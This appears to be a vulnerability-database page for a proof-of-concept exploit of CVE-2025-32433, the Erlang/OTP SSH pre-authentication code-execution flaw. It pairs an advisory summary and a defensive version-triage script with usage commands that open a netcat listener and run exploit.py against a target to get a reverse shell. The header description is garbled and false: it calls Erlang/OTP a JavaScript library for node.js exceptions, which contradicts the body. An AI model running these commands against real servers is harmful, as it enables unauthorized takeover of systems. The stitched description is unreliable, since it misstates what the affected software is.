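Related vulnerability
Title: Erlang/OTP access control error vulnerability (CVE-2025-32433)
Description: Erlang/OTP is an open-source library from Erlang/OTP, written in JavaScript, for handling exceptions. The library can catch exceptions raised by node.js built-in APIs. Versions of Erlang/OTP before 27.3.3 contain an access control error vulnerability that stems from a flaw in SSH protocol message handling and may lead to remote code execution.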
Description
CVE-2025-32433 Summary and Attack Overview
Introduction
# CVE-2025-32433
CVE-2025-32433 Summary and Attack Overview
CVE-2025-32433 is a critical unauthenticated remote code execution (RCE) vulnerability in the Erlang/OTP SSH server, disclosed on April 16, 2025. Erlang/OTP SSH is a library used in various distributed and telecom applications. The flaw arises from improper handling of SSH protocol messages: the server fails to enforce the normal authentication sequence, allowing an attacker to send specially crafted SSH messages before authentication. By doing so, the attacker can inject and execute arbitrary Erlang code on the server (nvd.nist.gov, offsec.com). In practical terms, this means an attacker with network access to a vulnerable Erlang/OTP SSH server (often running as root) can trigger a reverse shell or execute commands without any credentials, leading to full system compromise (nvd.nist.gov, offsec.com). This vulnerability is assigned CVSS 10.0 (maximum severity) (offsec.com).
Affected versions are all Erlang/OTP releases below OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 (the patched versions) (nvd.nist.gov, offsec.com). Affected systems often include Linux servers or appliances running an Erlang-based SSH daemon (not to be confused with OpenSSH). Importantly, default OpenSSH servers on Linux/BSD are not vulnerable (offsec.com). Users should assume any exposed Erlang/OTP SSH server is affected, and apply the official patches or disable the SSH service immediately.
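A version triage check built from the fixed releases listed above, as an added example (not code from this repository). The host names and inventory are constructed, and reporting release trains newer than 27 as "unknown" is an assumption, since the page does not cover them.

```python
import re

# Fixed releases per release train, taken from the advisory text above.
PATCHED = {27: (27, 3, 3), 26: (26, 2, 5, 11), 25: (25, 3, 2, 20)}

def parse_otp_version(text):
    """Turn 'OTP-26.2.5.11', '27.3.3' or '27.0-rc1' into a tuple of ints."""
    m = re.fullmatch(r"(?:OTP-)?(\d+(?:\.\d+)*)(?:-rc\d+)?", text.strip())
    if m is None:
        raise ValueError(f"unrecognised OTP version: {text!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) > 1 and parts[-1] == 0:   # treat 27.3.3.0 as 27.3.3
        parts.pop()
    return tuple(parts)

def classify(text):
    """Return 'vulnerable', 'patched' or 'unknown' for one version string."""
    version = parse_otp_version(text)
    major = version[0]
    if major > max(PATCHED):
        return "unknown"        # assumption: newer trains are not covered by the page
    if major not in PATCHED:
        return "vulnerable"     # older train: below every fixed release listed
    return "patched" if version >= PATCHED[major] else "vulnerable"

def triage(inventory):
    """Map {host: version string} to {status: sorted hosts}; bad input is 'unknown'."""
    report = {"vulnerable": [], "patched": [], "unknown": []}
    for host, text in inventory.items():
        try:
            status = classify(text)
        except ValueError:
            status = "unknown"
        report[status].append(host)
    return {status: sorted(hosts) for status, hosts in report.items()}

# Constructed inventory; host names and versions are made up for illustration.
SAMPLE = {
    "edge-01": "OTP-27.3.3",
    "edge-02": "27.3.2",
    "mq-01": "26.2.5.11",
    "mq-02": "OTP-26.2.5",
    "legacy-01": "24.3.4.17",
    "lab-01": "not-a-version",
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE).items():
        print(f"{status:10} {', '.join(hosts) or '-'}")
```

Hosts reported as "unknown" need a manual check of the installed release rather than being assumed safe.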
The attack works by initiating an SSH connection and then sending a sequence of SSH messages out of order.
Usage:

```
sudo chmod +x exploit.py
nc -nvlp <lport>
python3 exploit.py -t <target-ip> -p 22 --lhost <attacker-ip> --lport <lport>
```

Example:

```
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555
```
File snapshot
[4.0K] /data/pocs/424d1d9ed6c9ea118d5a28c368adbc8f70b85923
├── [2.2K] concept for CVE-2025-32433
├── [6.4K] exploit.py
├── [1.8K] README.md
└── [ 224] usage
0 directories, 4 files